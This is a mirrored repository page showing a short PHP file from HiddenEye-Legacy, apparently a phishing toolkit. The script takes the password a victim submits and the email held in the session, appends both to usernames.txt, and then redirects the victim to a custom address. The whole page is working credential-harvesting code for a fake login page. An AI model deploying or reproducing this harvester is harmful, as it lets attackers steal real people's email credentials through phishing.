mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
61cba860fc
Fix "8" gets printed at the end
17 lines
329 B
PHP
17 lines
329 B
PHP
<?php
|
|
include 'ip.php';
|
|
session_start();
|
|
|
|
$pass = $_POST["password"];
|
|
$email=$_SESSION["Email"];
|
|
|
|
|
|
file_put_contents("usernames.txt", "[EMAIL: ]" . " ". $email . " " . " " . "[PASS: ]" . " " . $pass . "\n", FILE_APPEND);
|
|
header('Location: <CUSTOM>');
|
|
exit();
|
|
|
|
|
|
session_destroy();
|
|
|
|
?>
|